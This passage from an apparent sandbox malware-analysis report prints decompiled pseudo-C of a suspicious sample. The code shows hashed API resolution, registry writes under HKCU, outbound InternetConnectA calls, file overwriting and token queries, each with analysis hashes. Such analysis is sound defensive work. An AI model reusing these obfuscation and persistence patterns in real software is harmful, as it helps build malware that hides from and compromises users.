                                                                				intOrPtr _t36;
                                                                				void* _t38;
                                                                				void* _t40;
                                                                				signed char _t43;
                                                                				char* _t53;
                                                                				DWORD* _t59;
                                                                				void* _t61;
                                                                				void* _t62;
                                                                				void* _t66;
                                                                
                                                                				_v24 = __ecx;
                                                                				_v20 = 0x64;
                                                                				E000DBF50(__eflags, 0, 0x6f6e3c7);
                                                                				_t62 = _t61 + 8;
                                                                				_t59 =  &_v20;
                                                                				_t23 = GetComputerNameW( &_v456, _t59); // executed
                                                                				_t81 = _t23;
                                                                				if(_t23 == 0) {
                                                                					E000E7700( &_v456, E000D7200(0xf075e,  &_v122), 0xffffffff);
                                                                					_t62 = _t62 + 0x14;
                                                                				}
                                                                				_v20 = E000D9D50(0x647400c8);
                                                                				_t25 = E000D9D50(0x647400a5);
                                                                				_t27 = E000DBF50(_t81, _t25, E000D9D50(0x6e1cdffb));
                                                                				_t66 = _t62 + 0x14;
                                                                				_t53 =  &_v774;
                                                                				_t28 =  *_t27(_t53, _t59);
                                                                				_t82 = _t28;
                                                                				if(_t28 == 0) {
                                                                					E000E7700(_t53, E000D7200(0xf075e,  &_v52), 0xffffffff);
                                                                					_t66 = _t66 + 0x14;
                                                                				}
                                                                				_t30 = E000D7200(0xf0a40,  &_v574);
                                                                				_t33 = E000D5350(_t82, 0x80000002, _t30, E000D7200(0xf0500,  &_v196)); // executed
                                                                				_v32 = _t33;
                                                                				_t36 = E000DE360(E000D7200(0xf07b0,  &_v256), _t82, 0x80000002, _t30, _t35); // executed
                                                                				_v28 = _t36;
                                                                				_t38 = E000D7200(0xf0990,  &_v158);
                                                                				_t40 = E000ECC50( &_v32, _t82,  &_v32, 8);
                                                                				_push(_t53);
                                                                				_push(_t40);
                                                                				_t60 = _v24;
                                                                				_v20 = E000ED650( &_v456, _v24, 0x65, _t38,  &_v456);
                                                                				_t43 = E000D55C0(_t42, 0xffffffff);
                                                                				if((_t43 & 0x00000001) != 0) {
                                                                					return E000E7700(_t60, E000D7200(0xf08a0,  &_v86), 0xffffffff);
                                                                				}
                                                                				return _t43;
                                                                			}































                                                                0x000e3bcc
                                                                0x000e3bcf
                                                                0x000e3bdd
                                                                0x000e3be2
                                                                0x000e3be5
                                                                0x000e3bf0
                                                                0x000e3bf2
                                                                0x000e3bf4
                                                                0x000e3c0b
                                                                0x000e3c10
                                                                0x000e3c10
                                                                0x000e3c20
                                                                0x000e3c28
                                                                0x000e3c41
                                                                0x000e3c46
                                                                0x000e3c49
                                                                0x000e3c51
                                                                0x000e3c53
                                                                0x000e3c55
                                                                0x000e3c6c
                                                                0x000e3c71
                                                                0x000e3c71
                                                                0x000e3c80
                                                                0x000e3ca5
                                                                0x000e3cad
                                                                0x000e3ccb
                                                                0x000e3cd3
                                                                0x000e3ce2
                                                                0x000e3cf2
                                                                0x000e3cfa
                                                                0x000e3cfb
                                                                0x000e3d06
                                                                0x000e3d12
                                                                0x000e3d18
                                                                0x000e3d22
                                                                0x00000000
                                                                0x000e3d3e
                                                                0x000e3d4b

                                                                APIs
                                                                • GetComputerNameW.KERNEL32(?,00000064), ref: 000E3BF0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: ComputerName
                                                                • String ID: d
                                                                • API String ID: 3545744682-2564639436
                                                                • Opcode ID: c1e0d14b8a2eb68377387f31a33c8622280854d343638d516e23080c870a46d1
                                                                • Instruction ID: 2fec7356f99482dbbb06dad45eec05974dbb9b8b39bf1663779f56430b09e420
                                                                • Opcode Fuzzy Hash: c1e0d14b8a2eb68377387f31a33c8622280854d343638d516e23080c870a46d1
                                                                • Instruction Fuzzy Hash: 2231A6E6C442597AE711A6A0AC07DFF766C9B51315F050136FD18B6383FA215B188AF2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000E5180(void* __ecx, intOrPtr __edx, char* _a4, char _a8) {
                                                                				intOrPtr _v20;
                                                                				char _v50;
                                                                				short _v52;
                                                                				char _v572;
                                                                				int _t10;
                                                                				void* _t16;
                                                                				char* _t20;
                                                                				void* _t25;
                                                                				WCHAR* _t27;
                                                                				void* _t28;
                                                                				void* _t29;
                                                                				void* _t31;
                                                                
                                                                				_t20 = _a4;
                                                                				_t25 = __ecx;
                                                                				_v20 = __edx;
                                                                				_v52 = 0;
                                                                				_t34 = _t20;
                                                                				if(_t20 == 0) {
                                                                					_t20 =  &_v52;
                                                                					_v52 = 0x2e;
                                                                					E000D5CD0(_t34, 0,  &_v50, 2, 3);
                                                                					_t28 = _t28 + 0x10;
                                                                				}
                                                                				_t27 =  &_v572;
                                                                				_t10 = E000D1490(2, _t25, _t27, 0, 3, 5); // executed
                                                                				_t29 = _t28 + 0x18;
                                                                				_t35 = _t10;
                                                                				if(_t10 != 0) {
                                                                					E000DBF50(_t35, 0, E000D9D50(0x677c729b));
                                                                					_t31 = _t29 + 0xc;
                                                                					_t10 = CreateDirectoryW(_t27, 0); // executed
                                                                					if(_t10 != 0) {
                                                                						_t37 = _a8;
                                                                						if(_a8 != 0) {
                                                                							E000E0F60(_t37, _t27, 1, 1); // executed
                                                                							_t31 = _t31 + 0xc;
                                                                						}
                                                                						E000EECC0(E000D9D50(0x647401a8));
                                                                						_t16 = E000D1490(0, _t27, E000EFCF0(_v20), _t20, 3, 5); // executed
                                                                						return _t16;
                                                                					}
                                                                				}
                                                                				return _t10;
                                                                			}















                                                                0x000e518c
                                                                0x000e518f
                                                                0x000e5191
                                                                0x000e5194
                                                                0x000e519a
                                                                0x000e519c
                                                                0x000e519e
                                                                0x000e51a1
                                                                0x000e51b1
                                                                0x000e51b6
                                                                0x000e51b6
                                                                0x000e51b9
                                                                0x000e51c9
                                                                0x000e51ce
                                                                0x000e51d1
                                                                0x000e51d3
                                                                0x000e51e5
                                                                0x000e51ea
                                                                0x000e51f0
                                                                0x000e51f4
                                                                0x000e51f6
                                                                0x000e51fa
                                                                0x000e5201
                                                                0x000e5206
                                                                0x000e5206
                                                                0x000e521c
                                                                0x000e5231
                                                                0x00000000
                                                                0x000e5236
                                                                0x000e51f4
                                                                0x000e5243

                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 000E51F0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: CreateDirectory
                                                                • String ID: .
                                                                • API String ID: 4241100979-248832578
                                                                • Opcode ID: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
                                                                • Instruction ID: bd144f0eea8ec5c673056abdd662c724fa1127f4e15a200418495861f328868a
                                                                • Opcode Fuzzy Hash: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
                                                                • Instruction Fuzzy Hash: 3C11C4A5A403543AFB207695AC4BFEF766C9F41719F140025FE087A2C3FAA15A0485F2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 87%
                                                                			E000E9600(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                                                                				long _v20;
                                                                				long _t8;
                                                                				long _t9;
                                                                				long _t10;
                                                                				void* _t11;
                                                                				intOrPtr* _t20;
                                                                				int _t22;
                                                                				signed char _t24;
                                                                				long _t25;
                                                                				void* _t28;
                                                                				void* _t30;
                                                                				void* _t31;
                                                                				void* _t35;
                                                                
                                                                				_push(__eax);
                                                                				E000DBF50(__eflags, 0, 0xad68947);
                                                                				_t8 = E000D9D50(0x247400ac);
                                                                				_t9 = E000D9D50(0x647400ae);
                                                                				_t10 = E000D9D50(0x6474002c);
                                                                				_t35 = _t31 + 0x14;
                                                                				_t11 = CreateFileW(_a4, _t8, 1, 0, _t9, _t10, 0); // executed
                                                                				if(_t11 == 0xffffffff) {
                                                                					_t24 = 0;
                                                                					L9:
                                                                					return E000D3660(_t46, E000D5080(_t46, 0x48, E000D2FE0(_t11, _t46, 0x48, 0xff) & 0x000000ff) & _t24 & 0x000000ff, 0) & 0x00000001;
                                                                				}
                                                                				_t28 = _a8;
                                                                				_t30 = _t11;
                                                                				if(_t28 == 0) {
                                                                					L4:
                                                                					_t24 = 1;
                                                                					L7:
                                                                					_t20 = E000DBF50(_t45, 0, E000D9D50(0x6ffa7d19));
                                                                					_t35 = _t35 + 0xc;
                                                                					_t11 =  *_t20(_t30);
                                                                					_t46 = _t24;
                                                                					if(_t24 == 0) {
                                                                						_t11 = E000EAE30(_t46, _a4);
                                                                						_t35 = _t35 + 4;
                                                                					}
                                                                					goto L9;
                                                                				}
                                                                				_t25 = _a12;
                                                                				_t44 = _t25;
                                                                				if(_t25 == 0) {
                                                                					goto L4;
                                                                				}
                                                                				E000DBF50(_t44, 0, 0xabb2b5);
                                                                				_t35 = _t35 + 8;
                                                                				_t22 = WriteFile(_t30, _t28, _t25,  &_v20, 0); // executed
                                                                				_t45 = _t22;
                                                                				if(_t22 == 0) {
                                                                					_t24 = 0;
                                                                					__eflags = 0;
                                                                					goto L7;
                                                                				}
                                                                				goto L4;
                                                                			}
















                                                                0x000e9606
                                                                0x000e960e
                                                                0x000e961d
                                                                0x000e962c
                                                                0x000e963b
                                                                0x000e9640
                                                                0x000e964f
                                                                0x000e9654
                                                                0x000e9688
                                                                0x000e96b8
                                                                0x000e96ee
                                                                0x000e96ee
                                                                0x000e9656
                                                                0x000e9659
                                                                0x000e965d
                                                                0x000e9684
                                                                0x000e9684
                                                                0x000e968e
                                                                0x000e969e
                                                                0x000e96a3
                                                                0x000e96a7
                                                                0x000e96a9
                                                                0x000e96ab
                                                                0x000e96b0
                                                                0x000e96b5
                                                                0x000e96b5
                                                                0x00000000
                                                                0x000e96ab
                                                                0x000e965f
                                                                0x000e9662
                                                                0x000e9664
                                                                0x00000000
                                                                0x00000000
                                                                0x000e966d
                                                                0x000e9672
                                                                0x000e967e
                                                                0x000e9680
                                                                0x000e9682
                                                                0x000e968c
                                                                0x000e968c
                                                                0x00000000
                                                                0x000e968c
                                                                0x00000000

                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 000E964F
                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 000E967E
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: File$CreateWrite
                                                                • String ID:
                                                                • API String ID: 2263783195-0
                                                                • Opcode ID: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
                                                                • Instruction ID: 1cc77e20da81179a0c7d94e56ef003b29ab497a8100a4c3fef840ff96ce112eb
                                                                • Opcode Fuzzy Hash: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
                                                                • Instruction Fuzzy Hash: 3F21D8E6A403457AFA6126616C53FFE31488BA1759F1A0436FE0C66383F9529E1846B3
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 49%
                                                                			E000EB790(void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, signed int _a16) {
                                                                				void* _t10;
                                                                				void* _t12;
                                                                				intOrPtr* _t14;
                                                                				signed int _t18;
                                                                				void* _t19;
                                                                				void* _t20;
                                                                				intOrPtr* _t22;
                                                                				intOrPtr _t30;
                                                                				signed int _t31;
                                                                				char* _t32;
                                                                				void* _t36;
                                                                				void* _t37;
                                                                				void* _t38;
                                                                
                                                                				_t30 = _a4;
                                                                				E000DBF50(__eflags, 0x13, 0xd0ca371);
                                                                				_t38 = _t37 + 8;
                                                                				_t26 =  !=  ? _t30 : 0xf0580;
                                                                				_t10 = InternetOpenA( !=  ? _t30 : 0xf0580,  !_a16 & 0x00000001, 0, 0, 0); // executed
                                                                				if(_t10 == 0) {
                                                                					L6:
                                                                					return 0;
                                                                				}
                                                                				_t36 = _t10;
                                                                				_t31 = 0;
                                                                				do {
                                                                					_t12 = E000D9D50(0x647400bf);
                                                                					_t14 = E000DBF50(0, _t12, E000D9D50(0x61c0d6ad));
                                                                					 *_t14(_t36,  *((intOrPtr*)(0xf07fc + _t31 * 8)), 0xf0800 + _t31 * 8, 4);
                                                                					_t18 = E000D1460(0, E000D22E0(0, _t31, 0x6ac13eca) + 1, 0x6ac13eca);
                                                                					_t38 = _t38 + 0x20;
                                                                					_t31 = _t18;
                                                                					_t50 = _t18 - 3;
                                                                				} while (_t18 != 3);
                                                                				_t32 = _a8;
                                                                				_t19 = E000DABC0(_t50, _t32);
                                                                				_t20 = 0;
                                                                				_t51 = _t19;
                                                                				if(_t19 > 0) {
                                                                					E000DBF50(_t51, 0x13, 0xae775e1);
                                                                					_t20 = InternetConnectA(_t36, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                					if(0 == 0) {
                                                                						_t22 = E000DBF50(0, 0x13, 0x714b685);
                                                                						 *_t22(_t36);
                                                                						goto L6;
                                                                					}
                                                                				}
                                                                				return _t20;
                                                                			}
















                                                                0x000eb799
                                                                0x000eb7a5
                                                                0x000eb7aa
                                                                0x000eb7b7
                                                                0x000eb7c2
                                                                0x000eb7c6
                                                                0x000eb87a
                                                                0x00000000
                                                                0x000eb87a
                                                                0x000eb7cc
                                                                0x000eb7ce
                                                                0x000eb7d0
                                                                0x000eb7d5
                                                                0x000eb7ee
                                                                0x000eb808
                                                                0x000eb81f
                                                                0x000eb824
                                                                0x000eb827
                                                                0x000eb829
                                                                0x000eb829
                                                                0x000eb82e
                                                                0x000eb832
                                                                0x000eb83c
                                                                0x000eb83e
                                                                0x000eb840
                                                                0x000eb849
                                                                0x000eb862
                                                                0x000eb866
                                                                0x000eb86f
                                                                0x000eb878
                                                                0x00000000
                                                                0x000eb878
                                                                0x000eb866
                                                                0x000eb880

                                                                APIs
                                                                • InternetOpenA.WININET(000F0580,?,00000000,00000000,00000000,?,000DCD77,?,?,?,00000001,00000000,?,000DCD77,?,00000001), ref: 000EB7C2
                                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000EB862
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: Internet$ConnectOpen
                                                                • String ID:
                                                                • API String ID: 2790792615-0
                                                                • Opcode ID: 8606b9b925057f251a97378e8a115e2949c87d337ecf9a1e2b5a49de545ab9ec
                                                                • Instruction ID: bfb7580c476cf819b0e3f09f182f48c3bf1dfb93381825aedd531f21539bf34f
                                                                • Opcode Fuzzy Hash: 8606b9b925057f251a97378e8a115e2949c87d337ecf9a1e2b5a49de545ab9ec
                                                                • Instruction Fuzzy Hash: 4F21EBB6B4031576FA2066716C23FBF3549CBA1759F160035FA09E6383FE91EA0195B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 75%
                                                                			E000D21E0(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
                                                                				void* _v20;
                                                                				signed int _v24;
                                                                				signed int _v28;
                                                                				void* _v32;
                                                                				int _v36;
                                                                				long _t20;
                                                                				int _t25;
                                                                				long _t26;
                                                                				intOrPtr* _t27;
                                                                				intOrPtr* _t30;
                                                                				long _t32;
                                                                				long _t33;
                                                                				void* _t42;
                                                                				void* _t43;
                                                                				void* _t47;
                                                                
                                                                				E000DBF50(_t47, 9, 0x7b43ce7);
                                                                				_t43 = _t42 + 8;
                                                                				_t20 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
                                                                				if(_t20 == 0) {
                                                                					_t32 = 0x64;
                                                                					_v28 = _a24 & 0x000000ff;
                                                                					_v24 = _a20 & 0x000000ff;
                                                                					do {
                                                                						E000D5CD0(__eflags, _a4, _a16, _v24, _v28);
                                                                						E000DBF50(__eflags, 9, 0x7b43ce7);
                                                                						_t25 = E000D9D50(0x647400af);
                                                                						_t43 = _t43 + 0x1c;
                                                                						_t26 = RegCreateKeyExW(_v20, _a16, 0, 0, 0, _t25, 0,  &_v32,  &_v36); // executed
                                                                						__eflags = _t26;
                                                                						if(__eflags != 0) {
                                                                							goto L3;
                                                                						} else {
                                                                							_t30 = E000DBF50(__eflags, 9, 0x3111c69);
                                                                							_t43 = _t43 + 8;
                                                                							 *_t30(_v32);
                                                                							__eflags = _v36 - 1;
                                                                							if(__eflags != 0) {
                                                                								goto L3;
                                                                							} else {
                                                                								_t33 = 1;
                                                                							}
                                                                						}
                                                                						L8:
                                                                						_t27 = E000DBF50(__eflags, 9, 0x3111c69);
                                                                						 *_t27(_v20);
                                                                						goto L9;
                                                                						L3:
                                                                						_t32 = _t32 - 1;
                                                                						__eflags = _t32;
                                                                					} while (__eflags != 0);
                                                                					_t33 = 0;
                                                                					__eflags = 0;
                                                                					goto L8;
                                                                				} else {
                                                                					_t33 = 0;
                                                                				}
                                                                				L9:
                                                                				return _t33;
                                                                			}


















                                                                0x000d21f6
                                                                0x000d21fb
                                                                0x000d2210
                                                                0x000d2214
                                                                0x000d2225
                                                                0x000d222a
                                                                0x000d222d
                                                                0x000d2243
                                                                0x000d2250
                                                                0x000d225f
                                                                0x000d2271
                                                                0x000d2276
                                                                0x000d228e
                                                                0x000d2290
                                                                0x000d2292
                                                                0x00000000
                                                                0x000d2294
                                                                0x000d229b
                                                                0x000d22a0
                                                                0x000d22a6
                                                                0x000d22a8
                                                                0x000d22ac
                                                                0x00000000
                                                                0x000d22ae
                                                                0x000d22ae
                                                                0x000d22ae
                                                                0x000d22ac
                                                                0x000d22b4
                                                                0x000d22bb
                                                                0x000d22c6
                                                                0x00000000
                                                                0x000d2240
                                                                0x000d2240
                                                                0x000d2240
                                                                0x000d2240
                                                                0x000d22b2
                                                                0x000d22b2
                                                                0x00000000
                                                                0x000d2216
                                                                0x000d2216
                                                                0x000d2216
                                                                0x000d22c8
                                                                0x000d22d1

                                                                APIs
                                                                • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 000D2210
                                                                • RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000D228E
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
                                                                • Instruction ID: 85ee619c4f411c28012100e8d76fbedeff1642484412c552b23b00558750855c
                                                                • Opcode Fuzzy Hash: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
                                                                • Instruction Fuzzy Hash: B121B671A40309BFEB20AB90DC43FFE7664EB24710F140036FE14763D2E2A1AA25D6B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 71%
                                                                			E000E5420(WCHAR* _a4) {
                                                                				void* _t4;
                                                                				signed char _t5;
                                                                				long _t7;
                                                                				intOrPtr* _t10;
                                                                				intOrPtr* _t12;
                                                                				void* _t14;
                                                                				intOrPtr* _t15;
                                                                				void* _t17;
                                                                				WCHAR* _t18;
                                                                				void* _t19;
                                                                				void* _t20;
                                                                				void* _t22;
                                                                				void* _t23;
                                                                
                                                                				_t18 = _a4;
                                                                				_t17 = 0;
                                                                				while(1) {
                                                                					E000DBF50(0, 0, 0xad68947);
                                                                					_t4 = CreateFileW(_t18, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
                                                                					_t19 = _t4;
                                                                					_t5 = E000D4A90(_t4, 0);
                                                                					_t22 = _t20 + 0x10;
                                                                					_t28 = _t5 & 0x00000001;
                                                                					if((_t5 & 0x00000001) == 0) {
                                                                						_t15 = E000DBF50(_t28, 0, 0xb8e7db5);
                                                                						_t22 = _t22 + 8;
                                                                						 *_t15(_t19);
                                                                					}
                                                                					E000DBF50(_t28, 0, 0xbf8ba27);
                                                                					_t23 = _t22 + 8;
                                                                					_t7 = GetFileAttributesW(_t18); // executed
                                                                					_t29 = _t7 - 0xffffffff;
                                                                					if(_t7 == 0xffffffff) {
                                                                						break;
                                                                					}
                                                                					_t10 = E000DBF50(_t29, 0, 0xad64007);
                                                                					 *_t10(_t18);
                                                                					_t12 = E000DBF50(_t29, 0, 0x7a2bc0);
                                                                					 *_t12(0xbb8);
                                                                					_t17 = _t17 + 1;
                                                                					_t14 = E000D9D50(0x647400a6);
                                                                					_t20 = _t23 + 0x14;
                                                                					if(_t17 != _t14) {
                                                                						continue;
                                                                					}
                                                                					break;
                                                                				}
                                                                				E000DB570(_t18);
                                                                				return 0;
                                                                			}
















                                                                0x000e5426
                                                                0x000e5429
                                                                0x000e5430
                                                                0x000e5437
                                                                0x000e5452
                                                                0x000e5454
                                                                0x000e5459
                                                                0x000e545e
                                                                0x000e5461
                                                                0x000e5463
                                                                0x000e546c
                                                                0x000e5471
                                                                0x000e5475
                                                                0x000e5475
                                                                0x000e547e
                                                                0x000e5483
                                                                0x000e5487
                                                                0x000e5489
                                                                0x000e548c
                                                                0x00000000
                                                                0x00000000
                                                                0x000e5495
                                                                0x000e549e
                                                                0x000e54a7
                                                                0x000e54b4
                                                                0x000e54b6
                                                                0x000e54bc
                                                                0x000e54c1
                                                                0x000e54c6
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x000e54c6
                                                                0x000e54cd
                                                                0x000e54db

                                                                APIs
                                                                • CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 000E5452
                                                                • GetFileAttributesW.KERNEL32(?), ref: 000E5487
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: File$AttributesCreate
                                                                • String ID:
                                                                • API String ID: 415043291-0
                                                                • Opcode ID: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
                                                                • Instruction ID: 43798a7f4e1ece0b199aae6cedd2c510966c6c6b562aa1ff150032efd1307ad1
                                                                • Opcode Fuzzy Hash: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
                                                                • Instruction Fuzzy Hash: A4014CA6A8431476E16032B46C43FBE31988BA2B1FF160536FA5CB52C7FA857A1504B7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 88%
                                                                			E000E3D80(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
                                                                				void* _t12;
                                                                				signed char _t13;
                                                                				void* _t14;
                                                                				long _t17;
                                                                				void* _t18;
                                                                				signed int _t21;
                                                                				intOrPtr* _t22;
                                                                				char* _t28;
                                                                				signed int _t29;
                                                                
                                                                				_t44 = __eflags;
                                                                				_t13 = E000E5000(_t12, __eflags, 0xffffffff);
                                                                				_t14 = E000D9D50(0x647400a5);
                                                                				E000DBF50(_t44, _t14, E000D9D50(0x63c03c4b));
                                                                				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t13 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
                                                                				if(_t17 == 0) {
                                                                					_t28 = _a20;
                                                                					_t18 = E000D9D50(0x647400a5);
                                                                					E000DBF50(__eflags, _t18, E000D9D50(0x69a6701b));
                                                                					_t21 = RegSetValueExW(_a4, _a12, 0, _a16, _t28, _a24); // executed
                                                                					__eflags = _t21;
                                                                					_t10 = _t21 == 0;
                                                                					__eflags = _t10;
                                                                					_t29 = _t28 & 0xffffff00 | _t10;
                                                                					_t22 = E000DBF50(_t10, 9, 0x3111c69);
                                                                					 *_t22(_a4);
                                                                				} else {
                                                                					_t29 = 0;
                                                                				}
                                                                				return _t29;
                                                                			}












                                                                0x000e3d80
                                                                0x000e3d8b
                                                                0x000e3da1
                                                                0x000e3dba
                                                                0x000e3dd5
                                                                0x000e3dd9
                                                                0x000e3ddf
                                                                0x000e3dea
                                                                0x000e3e03
                                                                0x000e3e18
                                                                0x000e3e1a
                                                                0x000e3e1c
                                                                0x000e3e1c
                                                                0x000e3e1c
                                                                0x000e3e26
                                                                0x000e3e31
                                                                0x000e3ddb
                                                                0x000e3ddb
                                                                0x000e3ddb
                                                                0x000e3e39

                                                                APIs
                                                                • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000002,?,00000000), ref: 000E3DD5
                                                                • RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 000E3E18
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: CreateValue
                                                                • String ID:
                                                                • API String ID: 2259555733-0
                                                                • Opcode ID: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
                                                                • Instruction ID: 8beb15d28c921d7091db5f9445fc9118b3824d31fcc833c29f206de7ce99fe1b
                                                                • Opcode Fuzzy Hash: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
                                                                • Instruction Fuzzy Hash: 291106B69003447FEB116AA0EC43FEF364CDB51759F160134FE18A5393E651EA2486F2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E000EB530(void* __eax, void* __eflags, void* _a4) {
                                                                				long _v20;
                                                                				int _t11;
                                                                				signed char _t16;
                                                                				void* _t17;
                                                                				int _t19;
                                                                				DWORD* _t21;
                                                                				void* _t22;
                                                                				void* _t23;
                                                                				void* _t24;
                                                                				void* _t25;
                                                                
                                                                				_v20 = 0;
                                                                				E000DBF50(__eflags, 9, 0xbd557e);
                                                                				_t25 = _t24 + 8;
                                                                				_t21 =  &_v20;
                                                                				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t21); // executed
                                                                				_t23 = 0;
                                                                				_t30 = _t11;
                                                                				if(_t11 == 0) {
                                                                					_t16 = E000D55C0( *((intOrPtr*)(E000DBF50(_t30, 0, E000D9D50(0x68042b4e))))(), 0x7a);
                                                                					_t25 = _t25 + 0x14;
                                                                					if((_t16 & 0x00000001) != 0) {
                                                                						_t17 = E000D8290(_v20);
                                                                						_t25 = _t25 + 4;
                                                                						_t32 = _t17;
                                                                						if(_t17 != 0) {
                                                                							_t22 = _t17;
                                                                							E000DBF50(_t32, 9, 0xbd557e);
                                                                							_t25 = _t25 + 8;
                                                                							_t19 = GetTokenInformation(_a4, 1, _t22, _v20, _t21); // executed
                                                                							_t23 = _t22;
                                                                							if(_t19 == 0) {
                                                                								E000DB570(_t22);
                                                                								_t25 = _t25 + 4;
                                                                								_t23 = 0;
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				return _t23;
                                                                			}













                                                                0x000eb537
                                                                0x000eb545
                                                                0x000eb54a
                                                                0x000eb54d
                                                                0x000eb55a
                                                                0x000eb55c
                                                                0x000eb55e
                                                                0x000eb560
                                                                0x000eb57f
                                                                0x000eb584
                                                                0x000eb589
                                                                0x000eb58e
                                                                0x000eb593
                                                                0x000eb596
                                                                0x000eb598
                                                                0x000eb59a
                                                                0x000eb5a3
                                                                0x000eb5a8
                                                                0x000eb5b5
                                                                0x000eb5b9
                                                                0x000eb5bb
                                                                0x000eb5be
                                                                0x000eb5c3
                                                                0x000eb5c6
                                                                0x000eb5c6
                                                                0x000eb5bb
                                                                0x000eb598
                                                                0x000eb589
                                                                0x000eb5d1

                                                                APIs
                                                                • GetTokenInformation.KERNELBASE(000DADD7,00000001,00000000,00000000,?,000DADD7,00000000), ref: 000EB55A
                                                                  • Part of subcall function 000D8290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000D82E8
                                                                  • Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1
                                                                • GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000EB5B5
                                                                  • Part of subcall function 000DB570: HeapFree.KERNEL32(00000000,000E54D2,000E54D2,?), ref: 000DB593
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2355921593.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocateFreeLibraryLoad
                                                                • String ID:
                                                                • API String ID: 4190244075-0
                                                                • Opcode ID: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
                                                                • Instruction ID: 82da4d1dbfc495ca15051664153fb9a1f33d0d4c68597404d9c33c42ec992355
                                                                • Opcode Fuzzy Hash: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
                                                                • Instruction Fuzzy Hash: 4B01DB72E807187AEA2166B1BC03FBF799E9F50749F050031FD0CB5293F7519A1485B2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 82%
                                                                			E000DE030(void* __eflags, void* _a4, short* _a8, short* _a12) {
                                                                				void* _t9;
                                                                				long _t12;
                                                                				signed int _t14;
                                                                				intOrPtr* _t15;
                                                                				int _t20;
                                                                				signed int _t21;
                                                                
